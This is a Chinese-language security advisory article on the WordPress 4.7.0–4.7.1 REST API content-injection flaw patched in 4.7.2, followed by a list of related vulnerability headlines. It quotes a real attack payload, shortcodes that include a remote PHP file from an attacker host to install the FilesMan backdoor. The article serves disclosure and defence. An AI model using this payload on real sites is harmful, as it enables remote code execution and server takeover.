高危漏洞預警:WordPressRESTAPI被利用安裝後門
近期攻擊者發現了一種利用WordPress REST API漏洞的方法,並通過安裝隱藏的後門來獲得對受害者伺服器的完全訪問。
1月26日,WordPress團隊釋出了WordPress 4.7.2,其中包含一個解決WordPress REST API中的漏洞的祕密修復,影響到REST API——來自Sucuri的安全研究人員最先發現該漏洞。未經授權的攻擊者利用該漏洞可注入惡意內容,以及進行提權,對文章、頁面等內容進行修改。REST API是最近新增到WordPress 4.7.0並預設啟用的。
漏洞發現者Sucuri介紹,這個缺陷影響WordPress 4.7.0和4.7.1,並允許攻擊者製作惡意HTTP請求,當傳送到一個WordPress網站將允許黑客繞過身份驗證方法,並更改部落格帖子的標題和內容和靜態 頁面。
簡單來說,攻擊者發現了通過REST API缺陷將自己的PHP程式碼傳送到WordPress站點的方法,直到那時它才被用於改變原有的文字。
content:"[insert_php] include(`http[:]//acommeamour.fr/tmp/xx.php`); [/insert_php]
[php] include(`http[:]//acommeamour.fr/tmp/xx.php`); [/php]",
"id":"61a"}
在實時攻擊中看到的上述原始碼片段將告訴WordPress引擎在每次使用者訪問該特定頁面時執行以下PHP命令,如果黑客插入木馬或其他惡意指令碼,影響將會擴大。
include(`http[:]//acommeamour.fr/tmp/xx.php`);
這行PHP程式碼將在受害者的站點上包含一個遠端PHP檔案,它將在WordPress / wp-content / uploads /資料夾中下載並安裝FilesMan PHP後門。
在將其HTTP請求傳送到站點的WordPress REST API後,攻擊者只需訪問一次損壞的頁面,然後訪問後門並接管受害者的底層伺服器。
鑑於WordPress使用的廣泛性,該漏洞的影響還是比較大的。使用 WordPress REST API 是簡便高效的通過 JSON 格式傳輸資料訪問或控制 WordPress 站點內容的方法。API 提供了對使用者、文章、分類等不同功能的控制,也可以通過 API 檢索或修改文章。Wordpress REST API 外掛在 4.70 整合到 WordPress 中,由於許可權控制失效導致內容注入或修改。WordPress開發團隊已經與Sucuri配合在最新的4.7.2版本中修復了該漏洞。
本文來自開源中國社群 [http://www.oschina.net]
相關文章
- 【漏洞預警】Redis 頻發高危漏洞Redis
- 高危!!Kubernetes 新型容器逃逸漏洞預警
- 【漏洞預警】Cisco 最新公佈24個高危以上漏洞
- 預警| Confluence 高危漏洞被大規模利用,阿里雲WAF接入即可防護,支援免費應急服務阿里
- WebLogic 高危漏洞預警(CVE-2019-2891、CVE-2019-2890)Web
- 高危預警 || 海雲安釋出Apache Log4j2漏洞處置方案Apache
- 威脅預警|微軟最新遠端高危漏洞通告及防禦措施微軟
- 席捲全球158國的Citrix高危漏洞正被利用,有黑客組織安置“獨家”後門黑客
- 緊急預警 | 威脅堪比永恆之藍,微軟高危RDP漏洞利用程式碼已被公佈,請儘快修補!微軟
- 知名軟體被利用,小心主機被開後門
- 高危預警:針對MySQL資料庫的勒索病毒MySql資料庫
- 【漏洞預警】AXIS大量攝像頭產品多個連環漏洞利用,影響嚴重
- 【最新】CVE-2021-3156漏洞預警
- 微軟:ProxyShell 漏洞“可能被利用”微軟
- 利用Exchange漏洞入侵安插後門,小心資料洩露
- 【最新】CVE-2021-3493 Ubuntu漏洞預警Ubuntu
- 風險預警|安芯網盾可實時防護Atlassian Confluence 高危漏CVE-2022-26134
- 高通處理器曝高危漏洞,波及全球超9億部安卓裝置安卓
- Windows遠端桌面服務漏洞預警通告Windows
- 微軟在 Android 裝置上的預裝 APP 中發現高危漏洞!下載量已達數百萬微軟AndroidAPP
- [漏洞預警]Laravel <= 8.4.2 Debug模式 _ignition 遠端程式碼執行漏洞Laravel模式
- 報告稱黑客利用華碩雲端儲存在PC上安裝Plead後門黑客
- 【漏洞預警】WordPress檔案刪除功能引發程式碼執行漏洞
- Spring爆出“核彈”級高危漏洞Spring
- 威脅預警:蠕蟲級漏洞,危害堪比WannaCry
- 重要預警 | Ubuntu 16.04 4.4 系列核心本地提權漏洞Ubuntu
- 【安全公告】Spring Core遠端命令執行漏洞預警Spring
- WhatsApp漏洞CVE-2019-11931可被利用來安裝間諜軟體APP
- 2023 SDC 議題預告 | 從探索到利用:揭示安卓模擬器漏洞安卓
- 高危預警|黑客模仿“諜中諜”在全球肆意傳播惡意木馬黑客
- 黑客利用思科智慧安裝漏洞,全球 20 萬臺路由器躺槍黑客路由器
- 思科修復高危漏洞;谷歌下架600款安卓應用;Android 11 開發者預覽版上線谷歌安卓Android
- XAMPP Windows PHP-CGI 程式碼執行漏洞(CVE-2024-4577) | Goby漏洞預警WindowsPHPGo
- Intel CPU被爆2大漏洞,或為其設計的祕密“後門”Intel
- [原創]緊急預警 | Windows 遠端桌面服務程式碼執行漏洞風險預警(CVE-2019-0708)Windows
- 德制語音裝置現秘密後門、APT正在利用最新漏洞|12月22日全球網路安全熱點APT
- Nvidia高危GPU漏洞;Win 10最新“996”補丁裝完藍屏;遊戲發售一週被盜版5萬次GPU996遊戲
- 全球再迎超級颶風,黑客可利用微軟“蠕蟲級”高危漏洞暴擊全球黑客微軟
- 研究顯示只有5.5%的被發現漏洞曾遭到利用